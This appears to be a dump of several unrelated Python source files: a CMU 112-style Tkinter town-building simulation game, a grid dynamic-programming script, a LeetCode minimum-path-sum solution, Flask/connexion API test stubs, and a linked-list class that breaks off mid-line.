https://www.cs.cmu.edu/~112/notes/notes-graphics.html\n\nHuman = make_dataclass('Human', ['startRow', 'startCol', 'endRow', 'endCol', 'path'])\n\nclass WelcomeMode(Mode):\n def appStarted(mode):\n mode.townName = 'no'\n mode.buttonColor1 = 'palegreen'\n mode.buttonColor2 = 'pink'\n mode.width1 = 0\n mode.width2 = 0\n\n def redrawAll(mode, canvas):\n frames.Welcome.draw(mode, canvas)\n \n def mouseMoved(mode, event):\n x, y = event.x, event.y\n \n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 - 2*mode.app.boxY) and \n (y <= mode.app.height//2 - mode.app.boxY)):\n mode.buttonColor1 = 'limegreen'\n mode.width1 = 2\n else: \n mode.buttonColor1 = 'palegreen'\n mode.width1 = 0\n\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 + mode.app.boxY) and \n (y <= mode.app.height//2 + 2*mode.app.boxY)):\n mode.buttonColor2 = 'lightcoral'\n mode.width2 = 2\n\n else:\n mode.buttonColor2 = 'pink'\n mode.width2 = 0\n\n def mousePressed(mode, event):\n x, y = event.x, event.y\n # first time, needs to make a choice\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 - 2*mode.app.boxY) and \n (y <= mode.app.height//2 - mode.app.boxY)):\n if (mode.app.create == None):\n mode.app.setActiveMode(mode.app.chooseMode)\n else:\n mode.app.setActiveMode(mode.app.gameMode)\n\n elif ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 + mode.app.boxY) and \n (y <=
mode.app.height//2 + 2*mode.app.boxY)):\n mode.app.setActiveMode(mode.app.instructsMode)\n\nclass InstructsMode(Mode):\n def appStarted(mode):\n mode.margin = 20\n mode.buttonColor3 = 'paleturquoise'\n mode.width3 = 0\n mode.buttonColor5 = 'palegreen'\n mode.width5 = 0\n mode.boxHeight = mode.height - 6*mode.margin\n \n def redrawAll(mode, canvas):\n frames.Instructs.draw(mode, canvas)\n\n # CITATION for mouseMoved: https://www.cs.cmu.edu/~112/notes/notes-animations-part3.html\n def mouseMoved(mode, event):\n x, y = event.x, event.y\n\n # hover on back button\n if ((x >= mode.app.width//2 - mode.app.backX) and \n (x <= mode.app.width//2 + mode.app.backX) and \n (y >= mode.app.backHeight - mode.app.backY) and \n (y <= mode.app.backHeight + mode.app.backY)):\n mode.buttonColor3 = 'mediumturquoise'\n mode.width3 = 2\n else:\n mode.buttonColor3 = 'paleturquoise'\n mode.width3 = 0\n \n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.boxHeight - mode.app.boxY) and \n (y <= mode.boxHeight)):\n mode.buttonColor5 = 'limegreen'\n mode.width5 = 2\n else:\n mode.buttonColor5 = 'palegreen'\n mode.width5 = 0\n\n def mousePressed(mode, event):\n x, y = event.x, event.y\n\n # go back\n if ((x >= mode.app.width//2 - mode.app.backX) and \n (x <= mode.app.width//2 + mode.app.backX) and \n (y >= mode.app.backHeight - mode.app.backY) and \n (y <= mode.app.backHeight + mode.app.backY)):\n mode.app.setActiveMode(mode.app.welcomeMode)\n\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.boxHeight - mode.app.boxY) and \n (y <= mode.boxHeight)):\n if (mode.app.create == None):\n mode.app.setActiveMode(mode.app.chooseMode)\n else:\n mode.app.setActiveMode(mode.app.gameMode)\n\nclass ChooseMode(Mode):\n\n def appStarted(mode):\n CreateMode.objectInfo(mode)\n mode.buttonColor1 = 'palegreen'\n mode.buttonColor2 = 'pink'\n mode.buttonColor3 = 'paleturquoise'\n mode.width1 = 0\n mode.width2 = 0\n mode.width3 = 0\n \n def redrawAll(mode, canvas):\n frames.Choose.draw(mode, canvas)\n \n def mouseMoved(mode, event):\n x, y = event.x, event.y\n \n # hover on first button\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 - 2*mode.app.boxY) and \n (y <= mode.app.height//2 - mode.app.boxY)):\n mode.buttonColor1 = 'limegreen'\n mode.width1 = 2\n else: \n mode.buttonColor1 = 'palegreen'\n mode.width1 = 0\n\n # hover on second button\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 + mode.app.boxY) and \n (y <= mode.app.height//2 + 2*mode.app.boxY)):\n mode.buttonColor2 = 'lightcoral'\n mode.width2 = 2\n else:\n mode.buttonColor2 = 'pink'\n mode.width2 = 0\n\n # hover on back button\n if ((x >= mode.app.width//2 - mode.app.backX) and \n (x <= mode.app.width//2 + mode.app.backX) and \n (y >= mode.app.backHeight - mode.app.backY) and \n (y <= mode.app.backHeight + mode.app.backY)):\n mode.buttonColor3 = 'mediumturquoise'\n mode.width3 = 2\n else:\n mode.buttonColor3 = 'paleturquoise'\n mode.width3 = 0\n \n def mousePressed(mode, event):\n x, y = event.x, event.y\n\n # self create\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 - 2*mode.app.boxY) and \n (y <= mode.app.height//2 - mode.app.boxY)):\n mode.app.create = True\n mode.app.setActiveMode(mode.app.createMode)\n \n # auto 
create\n elif ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 + mode.app.boxY) and \n (y <= mode.app.height//2 + 2*mode.app.boxY)):\n mode.app.create = False\n objects.RandomMap.getMap(mode)\n mode.app.setActiveMode(mode.app.gameMode)\n\n # go back\n elif ((x >= mode.app.width//2 - mode.app.backX) and \n (x <= mode.app.width//2 + mode.app.backX) and \n (y >= mode.app.backHeight - mode.app.backY) and \n (y <= mode.app.backHeight + mode.app.backY)):\n mode.app.setActiveMode(mode.app.welcomeMode)\n\nclass CreateMode(Mode):\n\n def appStarted(mode):\n mode.tipiUnlocked = mode.houseUnlocked = mode.skyscraperUnlocked = mode.treeUnlocked = False\n mode.humans = []\n mode.objectInfo()\n mode.margin = 20\n mode.frameRightbound = 3*(mode.width/4) # 3*375 = 1125\n mode.infoWidth = mode.width - 2*mode.margin - mode.frameRightbound\n mode.infoMidX = mode.frameRightbound + mode.margin + mode.infoWidth/2\n mode.buttonR = 50\n mode.townName = 'town'\n\n mode.year = 0\n mode.population = 0\n\n # instruction bools\n\n mode.lakeMessage = True\n mode.mountainMessage = False\n mode.houseMessage = False\n mode.treeMessage = False\n mode.startMessage = False\n\n mode.placingLake = False\n mode.placingMountains = False\n mode.placingHomes = False\n mode.placingTrees = False\n\n mode.messageMidX = mode.margin + 160\n mode.messageMidY = mode.margin + 30\n\n # button info\n mode.buttonColor4 = 'palegreen'\n mode.width4 = 0\n mode.tipiOutline = mode.houseOutline = mode.skyscraperOutline = mode.treeOutline = 'white'\n \n def objectInfo(mode):\n mode.margin = 20\n mode.frameRightbound = 3*(mode.width/4)\n mode.signX = 3*mode.margin\n mode.signY = mode.height/2\n mode.lakeRX = 120\n mode.lakeRY = 80\n mode.mountainR = 80\n mode.treeR = 20\n mode.objectR = 5\n mode.tipiR = 25\n mode.houseR = 15\n mode.skyscraperR = 25\n \n # CITATIONS\n # grass jpeg: https://depositphotos.com/128558532/stock-photo-green-grass-background-texture.html\n # lake png: https://www.seekpng.com/ipng/u2q8o0r5e6e6y3a9_lake-png-transparent-image-lake-clipart-transparent-background/\n # mountain png: https://www.cleanpng.com/png-sugarloaf-mountain-computer-icons-mountain-699724/\n # tree png: http://clipart-library.com/free/pine-tree-clipart-png.html\n # tipi png: https://www.pngwing.com/en/free-png-zopse\n # house png: https://www.flaticon.com/free-icon/medieval-house_509843#\n # skyscraper png: https://www.pngegg.com/en/png-bcubn\n\n # images\n mode.grassIMG = mode.loadImage('grass.jpg')\n mode.treeIMG = mode.loadImage('tree.png')\n mode.treeIMG = mode.scaleImage(mode.treeIMG, 1/4)\n mode.mountainIMG = mode.loadImage('mountain.png')\n mode.mountainIMG = mode.scaleImage(mode.mountainIMG, 1/6)\n mode.lakeIMG = mode.loadImage('lake.png')\n mode.lakeIMG = mode.scaleImage(mode.lakeIMG, 1/2)\n mode.tipiIMG = mode.loadImage('tipi.png')\n mode.houseIMG = mode.loadImage('house.png')\n mode.houseIMG = mode.scaleImage(mode.houseIMG, 1/2)\n mode.skyscraperIMG = mode.loadImage('skyscraper.png')\n\n # draw images (i drew these on my ipad!)\n mode.drawWelcome = mode.loadImage('drawWelcome.png')\n mode.drawWelcome = mode.scaleImage(mode.drawWelcome, 1/3)\n mode.drawTipi = mode.loadImage('drawtipi.png')\n mode.drawTipi = mode.scaleImage(mode.drawTipi, 1/3)\n mode.drawHouse = mode.loadImage('drawhouse.png')\n mode.drawHouse = mode.scaleImage(mode.drawHouse, 1/3)\n mode.drawSkyscraper = mode.loadImage('drawskyscraper.png')\n mode.drawSkyscraper = mode.scaleImage(mode.drawSkyscraper, 1/3)\n 
mode.drawPandemic = mode.loadImage('drawpandemic.png')\n mode.drawPandemic = mode.scaleImage(mode.drawPandemic, 1/3)\n mode.drawFamine = mode.loadImage('drawfamine.png')\n mode.drawFamine = mode.scaleImage(mode.drawFamine, 1/3)\n mode.drawFire = mode.loadImage('drawfire.png')\n mode.drawFire = mode.scaleImage(mode.drawFire, 1/3)\n mode.drawEarthquake = mode.loadImage('drawearthquake.png')\n mode.drawEarthquake = mode.scaleImage(mode.drawEarthquake, 1/3)\n mode.drawEnd = mode.loadImage('drawend.png')\n mode.drawEnd = mode.scaleImage(mode.drawEnd, 1/3)\n \n def mouseMoved(mode, event):\n (x,y) = (event.x, event.y)\n # view instructions\n if ((x >= mode.infoMidX - 60) and \n (x <= mode.infoMidX + 60) and \n (y >= mode.height - 80) and \n (y <= mode.height - 60)):\n mode.buttonColor4 = 'limegreen'\n mode.width4 = 2\n else:\n mode.buttonColor4 = 'palegreen'\n mode.width4 = 0\n\n def mousePressed(mode, event):\n\n (x,y) = (event.x, event.y)\n # view instructions\n if ((x >= mode.infoMidX - 60) and \n (x <= mode.infoMidX + 60) and \n (y >= mode.height - 80) and \n (y <= mode.height - 60)):\n mode.app.setActiveMode(mode.app.instructsMode)\n\n # placing lake\n if mode.lakeMessage:\n mode.placingLake = True\n if mode.placingLake and play.Play.isValid(mode, x, y, mode.lakeRX):\n objects.Lake.lake = (x,y)\n mode.placingLake = False\n mode.placingMountains = True\n mode.lakeMessage = False\n mode.mountainMessage = True\n \n # placing mountains\n elif mode.placingMountains and play.Play.isValid(mode, x, y, mode.mountainR):\n objects.Mountain.mountains.append((x, y))\n if len(objects.Mountain.mountains) == 2:\n mode.mountainMessage = False\n mode.houseMessage = True\n mode.placingMountains = not mode.placingMountains\n mode.placingHomes = not mode.placingHomes\n\n # placing homes\n elif mode.placingHomes and play.Play.isValid(mode, x, y, mode.tipiR):\n objects.Tipi.tipis.append((x, y))\n if len(objects.Tipi.tipis) == 10:\n mode.houseMessage = False\n mode.treeMessage = True\n mode.placingHomes = False\n mode.placingTrees = True\n\n # placing trees\n elif mode.placingTrees and play.Play.isValid(mode, x, y, mode.treeR):\n objects.Tree.trees.append((x, y))\n if len(objects.Tree.trees) >= 10:\n mode.treeMessage = False\n mode.placingTrees = False\n mode.move = True\n mode.version = 0\n mode.startMessage = True\n mode.app.setActiveMode(mode.app.gameMode)\n\n def redrawAll(mode, canvas):\n frames.Frame.draw(mode, canvas)\n frames.Info.draw(mode, canvas, mode.year, mode.population)\n\n objects.WelcomeSign.draw(mode, canvas)\n objects.Lake.draw(mode, canvas)\n objects.Mountain.draw(mode, canvas)\n objects.Tipi.draw(mode, canvas)\n objects.Tree.draw(mode, canvas)\n\n if mode.app.createMode:\n message.Message.draw(mode, canvas)\n\nclass GameMode(Mode):\n def appStarted(mode):\n\n #bools\n mode.paused = True\n mode.move = False\n mode.townName = 'town'\n mode.gameEnd = False\n\n # info\n mode.year = 0\n mode.population = 0\n\n # button info\n mode.buttonColor4 = 'palegreen'\n mode.width4 = 0\n mode.tipiOutline = 'white'\n mode.houseOutline = 'white'\n mode.skyscraperOutline = 'white'\n mode.treeOutline = 'white'\n\n # new objects\n mode.addTipi = False\n mode.addHouse = False\n mode.addSkyscraper = False\n mode.addTree = False\n\n # frame info\n mode.margin = 20\n mode.frameRightbound = 3*(mode.width/4) # 3*375 = 1125\n \n mode.infoWidth = mode.width - 2*mode.margin - mode.frameRightbound\n mode.infoMidX = mode.frameRightbound + mode.margin + mode.infoWidth/2\n mode.buttonR = 50\n\n mode.cellSize = 5\n mode.rows = 
152\n mode.cols = 219\n mode.grid = [([0] * mode.cols) for row in range(mode.rows)]\n mode.humans = [[None, None, None, None] for i in range(5)]\n\n # messages\n mode.lakeMessage = mode.mountainMessage = mode.houseMessage = False\n mode.treeMessage = False\n mode.startMessage = True\n mode.messageMidX = mode.app.margin + 160\n mode.messageMidY = mode.app.margin + 30\n\n # progress window\n mode.game = mode.frameRightbound - mode.margin\n mode.windowX = (mode.frameRightbound - mode.margin) // 2\n mode.windowY = mode.height // 2\n mode.windowXR = 350\n mode.windowYR = 250\n mode.windowOn = True\n mode.message1 = False\n mode.message2 = False\n mode.version = 0\n\n # more bools for the interactive buttons\n mode.tipiUnlocked = False\n mode.houseUnlocked = False\n mode.skyscraperUnlocked = False\n mode.treeUnlocked = False\n\n # initialize game\n CreateMode.objectInfo(mode)\n mode.townName = mode.getUserInput(\"What is the name of your town?\")\n mode.grid = astar.AStar.obstacles(mode)\n mode.humans = play.Play.getHumans(mode)\n mode.possibleDisasters = [None, 'pandemic', 'famine', 'wildfire', 'earthquake']\n\n def mouseMoved(mode, event):\n (x,y) = (event.x, event.y)\n \n # on tipi button\n if (mode.addTipi == False) and (mode.tipiUnlocked == True):\n if ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 200 - mode.buttonR) and\n (y <= 200 + mode.buttonR)):\n mode.tipiOutline = 'black'\n else:\n mode.tipiOutline = 'white'\n\n # on house button\n if (mode.addHouse == False) and (mode.houseUnlocked == True):\n if ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 350 - mode.buttonR) and\n (y <= 350 + mode.buttonR)):\n mode.houseOutline = 'black'\n else:\n mode.houseOutline = 'white'\n \n # on skyscraper button\n if (mode.addSkyscraper == False) and (mode.skyscraperUnlocked == True):\n if ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 500 - mode.buttonR) and\n (y <= 500 + mode.buttonR)):\n mode.skyscraperOutline = 'black'\n else:\n mode.skyscraperOutline = 'white'\n\n # on tree button\n if (mode.addTree == False) and (mode.treeUnlocked == True):\n if ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 650 - mode.buttonR) and\n (y <= 650 + mode.buttonR)):\n mode.treeOutline = 'black'\n else:\n mode.treeOutline = 'white'\n \n # view instructions\n if ((x >= mode.infoMidX - 60) and \n (x <= mode.infoMidX + 60) and \n (y >= mode.height - 80) and \n (y <= mode.height - 60)):\n mode.buttonColor4 = 'limegreen'\n mode.width4 = 2\n else:\n mode.buttonColor4 = 'palegreen'\n mode.width4 = 0\n \n # view instructions\n def mousePressed(mode, event):\n\n x, y = event.x, event.y\n\n # go to instructions\n if ((x >= mode.infoMidX - 60) and \n (x <= mode.infoMidX + 60) and \n (y >= mode.height - 80) and \n (y <= mode.height - 60)):\n mode.app.setActiveMode(mode.app.instructsMode)\n\n # choose tipi option\n elif ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 200 - mode.buttonR) and\n (y <= 200 + mode.buttonR) and\n (mode.tipiUnlocked == True)):\n mode.addTipi = True\n mode.tipiOutline = 'red'\n\n # add new tipi\n elif mode.addTipi == True:\n if play.Play.isValid(mode, x, y, mode.tipiR):\n objects.Tipi.tipis.append((x, y))\n mode.addTipi = False\n mode.tipiOutline = 'white'\n\n # choose house option\n elif ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 350 - 
mode.buttonR) and\n (y <= 350 + mode.buttonR) and\n (mode.houseUnlocked == True)):\n mode.addHouse = True\n mode.houseOutline = 'red'\n\n # add new house\n elif mode.addHouse == True:\n # upgrade existing tipi\n new = play.Play.upgradeTipi(mode, x, y)\n if new != None:\n objects.Tipi.tipis.remove(new)\n objects.House.houses.append(new)\n mode.addHouse = False\n mode.houseOutline = 'white'\n # add newHouse\n elif play.Play.isValid(mode, x, y, mode.houseR):\n objects.House.houses.append((x, y))\n mode.addHouse = False\n mode.houseOutline = 'white'\n \n # choose skyscraper option\n elif ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 500 - mode.buttonR) and\n (y <= 500 + mode.buttonR) and\n (mode.skyscraperUnlocked == True)):\n mode.addSkyscraper = True\n mode.skyscraperOutline = 'red'\n\n # add new skyscraper\n elif mode.addSkyscraper == True:\n # upgrade existing house\n new = play.Play.upgradeHouse(mode, x, y)\n if new != None:\n objects.House.houses.remove(new)\n objects.Skyscraper.skyscrapers.append(new)\n mode.addSkyscraper = False\n mode.skyscraperOutline = 'white'\n deadTree = random.choice(objects.Tree.trees)\n objects.Tree.trees.remove(deadTree)\n # add new skyscraper\n elif play.Play.isValid(mode, x, y, mode.skyscraperR):\n objects.Skyscraper.skyscrapers.append((x, y))\n mode.addSkyscraper = False\n mode.skyscraperOutline = 'white'\n deadTree = random.choice(objects.Tree.trees)\n objects.Tree.trees.remove(deadTree)\n\n # choose tree option\n elif ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 650 - mode.buttonR) and\n (y <= 650 + mode.buttonR) and\n (mode.treeUnlocked == True)):\n mode.addTree = True\n mode.treeOutline = 'red'\n\n # add new tree\n elif mode.addTree == True:\n if play.Play.isValid(mode, x, y, mode.treeR):\n objects.Tree.trees.append((x, y))\n mode.addTree = False\n mode.TreeOutline = 'white'\n \n def keyPressed(mode, event):\n if event.key == 'p':\n mode.paused = not mode.paused\n elif (event.key == 'Enter') and (mode.windowOn == True):\n if mode.gameEnd != True:\n mode.windowOn = False\n mode.paused = False\n mode.move = True\n elif (event.key == 's') and (mode.paused == True):\n mode.takeStep()\n\n def takeStep(mode):\n mode.year += 1\n play.Play.moveHuman(mode)\n \n # humans immigrate to the town every 100 years\n if mode.year % 100 == 0 and mode.year != 0:\n newHumans = random.randint(1, 4)\n for i in range(newHumans):\n play.Play.getNewHuman(mode, mode.rows//2, 1)\n \n # progress 1: unlocked new tipis\n if mode.year == 100:\n mode.paused = True\n mode.addTipi = mode.addHouse = mode.addSkyscraper = mode.addTree = False\n mode.tipiUnlocked = True\n mode.version = 1\n mode.windowOn = True\n\n # progress 2: unlocked stone houses\n if mode.year == 225:\n mode.paused = True\n mode.addTipi = mode.addHouse = mode.addSkyscraper = mode.addTree = False\n mode.houseUnlocked = True\n mode.version = 2\n mode.windowOn = True\n \n # progress 10: unlocked skyscrapers by upgrading all tipis to houses\n if len(objects.Tipi.tipis) == 0 and mode.message1 == False:\n mode.paused = True\n mode.addTipi = mode.addHouse = mode.addSkyscraper = mode.addTree = False\n mode.skyscraperUnlocked = True\n mode.tipiUnlocked = False\n mode.version = 10\n mode.windowOn = True\n mode.message1 = True\n\n # after 3 skyscrapers are placed, unlock the option of planting trees\n if len(objects.Skyscraper.skyscrapers) == 5 and mode.message2 == False:\n mode.paused = True\n mode.addTipi = mode.addHouse = 
mode.addSkyscraper = mode.addTree = False\n mode.treeUnlocked = True\n mode.version = 15\n mode.windowOn = True\n mode.message2 = True\n print('sky unlocked', mode.skyscraperUnlocked) # True\n print('addSkyscraper', mode.addSkyscraper) # False\n\n # end game: overpopulation or lack of resources or no more disasters\n if (len(mode.humans) >= 75) or (len(objects.Tree.trees) == 0) or (len(mode.possibleDisasters) == 0):\n mode.paused = True\n mode.version = 100\n mode.windowOn = True\n disaster.Disaster.end(mode)\n mode.gameEnd = True\n\n # starting at year 250, every 200 years there's a chance of a disaster occurring\n if ((mode.year - 350) % 100 == 0) and (mode.year >= 350):\n current = random.choice(mode.possibleDisasters)\n mode.paused = True\n mode.addTipi = mode.addHouse = False\n if current == None:\n mode.paused = False\n if current == 'pandemic':\n mode.version = 3\n mode.windowOn = True\n disaster.Disaster.pandemic(mode)\n mode.possibleDisasters.remove('pandemic')\n elif current == 'famine':\n mode.version = 4\n mode.windowOn = True\n disaster.Disaster.famine(mode)\n mode.possibleDisasters.remove('famine')\n elif current == 'wildfire':\n mode.version = 5\n mode.windowOn = True\n disaster.Disaster.wildfire(mode)\n mode.possibleDisasters.remove('wildfire')\n elif current == 'earthquake':\n mode.version = 6\n mode.windowOn = True\n disaster.Disaster.earthquake(mode)\n mode.possibleDisasters.remove('earthquake')\n\n # end game: overpopulation, war, pollution\n if (len(mode.humans) >= 75) or (len(objects.Tree.trees) == 0):\n mode.paused = True\n mode.version = 100\n mode.windowOn = True\n disaster.Disaster.end(mode)\n mode.gameEnd = True\n \n def timerFired(mode):\n if not mode.paused:\n mode.takeStep()\n\n def redrawAll(mode, canvas):\n frames.Frame.draw(mode, canvas)\n frames.Info.draw(mode, canvas, mode.year, mode.population)\n\n objects.WelcomeSign.draw(mode, canvas)\n objects.Lake.draw(mode, canvas)\n objects.Mountain.draw(mode, canvas)\n objects.Tipi.draw(mode, canvas)\n objects.House.draw(mode, canvas)\n objects.Skyscraper.draw(mode, canvas)\n objects.Tree.draw(mode, canvas)\n if mode.windowOn:\n message.Message.draw(mode, canvas)\n \n if mode.move:\n objects.Human.draw(mode, canvas)\n if mode.windowOn:\n message.Progress.draw(mode, canvas)\n\n# CITATION: the MyModalApp class framework from cmu 112 notes\n# https://www.cs.cmu.edu/~112/notes/notes-animations-part3.html\nclass MyModalApp(ModalApp):\n def appStarted(app):\n\n app.margin = 20\n app.boxX = 120\n app.boxY = 50\n app.backX = 50\n app.backY = 20\n app.backHeight = app.height - 3*app.margin\n app.buttonR = 50\n app.create = None\n\n app.drawStart = app.loadImage('drawend.png')\n app.drawStart = app.scaleImage(app.drawStart, 1/1.35)\n\n app.welcomeMode = WelcomeMode()\n app.gameMode = GameMode()\n app.instructsMode = InstructsMode()\n app.chooseMode = ChooseMode()\n\n app.createMode = CreateMode()\n app.setActiveMode(app.welcomeMode)\n\napp = MyModalApp(width=1500, height=800)","sub_path":"meso.py","file_name":"meso.py","file_ext":"py","file_size_in_byte":28074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428975956","text":"import operator\narr = []\ntry:\n while True:\n arr.append(input())\nexcept:\n pass\narr = arr[1:-1]\narr = [i.strip()[1:-1].replace(\"]\", \"\").split(\",\") for i in arr]\nmatrix = [[int(j) for j in i] for i in arr]\n\nm = len(matrix)\nn = len(matrix[0])\n\ndp = [[1] * n for i in range(m)]\n\nslist = sorted([(i, j, val)\n for i, row in 
enumerate(matrix)\n for j, val in enumerate(row)], key=operator.itemgetter(2))\n\nfor x, y, val in slist:\n for dx, dy in zip([1, 0, -1, 0], [0, 1, 0, -1]):\n nx, ny = x + dx, y + dy\n if 0 <= nx < m and 0 <= ny < n and matrix[nx][ny] > matrix[x][y]:\n dp[nx][ny] = max(dp[nx][ny], dp[x][y] + 1)\nprint(max(max(x) for x in dp))","sub_path":"Code/CodeRecords/2773/49361/293587.py","file_name":"293587.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9803773","text":"#\n# @lc app=leetcode.cn id=64 lang=python3\n#\n# [64] 最小路径和\n#\n\n# @lc code=start\nclass Solution:\n def minPathSum(self, grid: List[List[int]]) -> int:\n # 要从左上角到右下角的路径和,到(i, j)的路径和,即为pd[m-1][n-1]\n # m * n 网格\n m = len(grid)\n n = len(grid[0])\n dp = [[0]*n for _ in range(m)]\n\n # 初始值\n dp[0][0] = grid[0][0]\n for i in range(1, n):\n dp[0][i] = grid[0][i] + dp[0][i-1]\n\n for i in range(1, m):\n dp[i][0] = grid[i][0] + dp[i-1][0]\n\n for i in range(1, m):\n for j in range(1, n):\n dp[i][j] = grid[i][j] + min(dp[i-1][j], dp[i][j-1])\n \n return dp[m-1][n-1]\n# @lc code=end\n\n","sub_path":"动态规划/64.最小路径和.py","file_name":"64.最小路径和.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64971110","text":"#\n# run me with nosetests -vs test_oas.py\n#\nimport logging\nimport sys\n\nimport connexion\nfrom connexion.resolver import Resolver\nfrom flask_testing import TestCase\n\nme = sys.modules[__name__]\n\n\ndef noop(*args, **kwds): raise NotImplementedError\n\n\nclass FakeResolver(Resolver):\n\n def resolve_operation_id(self, operation):\n \"\"\"\n Mock operation id, just to validate API.\n :type operation: connexion.operations.AbstractOperation\n \"\"\"\n oid = operation.operation_id\n if \".\" in oid:\n oid = oid.split(\".\")[-1]\n # Append the operation function to this module.\n setattr(me, oid, noop)\n return \"test_oas.\" + oid\n\n\nclass BaseTestCase(TestCase):\n\n def create_app(self):\n logging.getLogger('connexion.operation').setLevel('ERROR')\n app = connexion.App(__name__, specification_dir='.')\n app.add_api('spid.yaml')\n app.app.config[\"SAML_PATH\"] = \"saml/\"\n return app.app\n\n\ndef test_oas3():\n files = (\"spid.yaml\", )\n\n def assert_parse_oas3(zapp, f):\n zapp.add_api(f, resolver=FakeResolver())\n\n for f in files:\n zapp = connexion.FlaskApp(__name__, specification_dir='.',)\n yield assert_parse_oas3, zapp, f\n\n\nclass TestPublicController(BaseTestCase):\n \"\"\"PublicController integration test stubs\"\"\"\n\n def test_get_echo_401(self):\n \"\"\"Test case for get_echo\n \"\"\"\n response = self.client.open(\n '/echo',\n method='GET')\n self.assert401(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_metadata_unauthenticated(self):\n \"\"\"Test case for get_metadata\n \"\"\"\n response = self.client.open(\n '/metadata',\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n","sub_path":"python-flask-spid/test_oas.py","file_name":"test_oas.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"213886432","text":"class LinkedList:\n \"\"\"Serves a different purpose in comparison to built-in list.\"\"\"\n\n # Inviside to the outside (by using two underscores)\n class __Node:\n def __init__(self, item, next=None):\n \"\"\"\n One node has two 
parts, one is the value itself (item),\n the other half points/references to the next node (next).\n \"\"\"\n self.item = item\n self.next = next\n\n def get_item(self):\n return self.item\n\n def get_next(self):\n return self.next\n\n def set_item(self, item):\n self.item = item\n\n def set_next(self, next):\n self.next = next\n\n def __init__(self, contents={}):\n # Both point to a dummy node to begin with (alway the 1st, no `item`(val))\n self.first = LinkedList.__Node(None, None)\n self.last = self.first\n\n self.num_items = 0\n\n for cont in contents:\n self.append(cont)\n\n def append(self, item):\n \"\"\"\n Each append will always take the same amount of time (O(1)).\n But of course, it also takes up twice the spce of a random accessible\n list since there has to be room for both the refs to {item, next node}.\n \"\"\"\n node = LinkedList.__Node(item)\n self.last.set_next(node)\n self.last = node\n self.num_items += 1\n\n def insert(self, index, item):\n \"\"\"\n Suits for doing many inserts near the beginning of a list.\n\n Either inserts into the specified location (with O(ELEM_BEFORE)),\n or simply append to the end of the list (with O(1)).\n\n Two scenarios where the complexity would be O(1)\n - insert at the beginning of a list\n - the index is greater than current size (therefore append)\n \"\"\"\n cursor = self.first\n\n if index < self.num_items:\n for i in range(index):\n cursor = cursor.get_next()\n\n node = LinkedList.__Node(item, cursor.get_next())\n cursor.set_next(node)\n self.num_items += 1\n else:\n self.append(item)\n\n def __getitem__(self, index):\n \"\"\"\n Impractical impl (O(N)). Use list if random access is desired.\n Linked lists require linear search to access a particular location.\n \"\"\"\n if index >= 0 and index < self.num_items:\n cursor = self.first.get_next()\n for i in range(index):\n cursor = cursor.get_next()\n\n return cursor.get_item()\n\n raise IndexError(\"LinkedList index out of range (get)\")\n\n def __setitem__(self, index, val):\n \"\"\"\n Impractical impl (O(N)). 
Use list if random access is desired.\n Linked lists require linear search to access a particular location.\n \"\"\"\n if index >= 0 and index < self.num_items:\n cursor = self.first.get_next()\n for i in range(index):\n cursor = cursor.get_next()\n\n cursor.set_item(val)\n return None\n\n raise IndexError(\"LinkedList assignment out of range (set)\")\n\n def __add__(self, other):\n \"\"\"\n Given [1, 3] & [2, 0], excepts [1, 3, 2, 0], aka \"concatenation\".\n \"\"\"\n # Don't use fixed isinstance(X, CLS), it'd fail if being imported.\n if type(self) != type(other):\n raise TypeError(\n f\"Concatenate undefined for \"\n f\"{str(type(self))} + {str(type(other))}\"\n )\n\n result = LinkedList()\n\n # Skip the 1st element as there's no value inside (`item`)\n cursor_self = self.first.get_next()\n\n while cursor_self is not None:\n result.append(cursor_self.get_item())\n cursor_self = cursor_self.get_next()\n\n # Skip the 1st element as there's no value inside (`item`)\n cursor_other = other.first.get_next()\n\n while cursor_other is not None:\n result.append(cursor_other.get_item())\n cursor_other = cursor_other.get_next()\n\n return 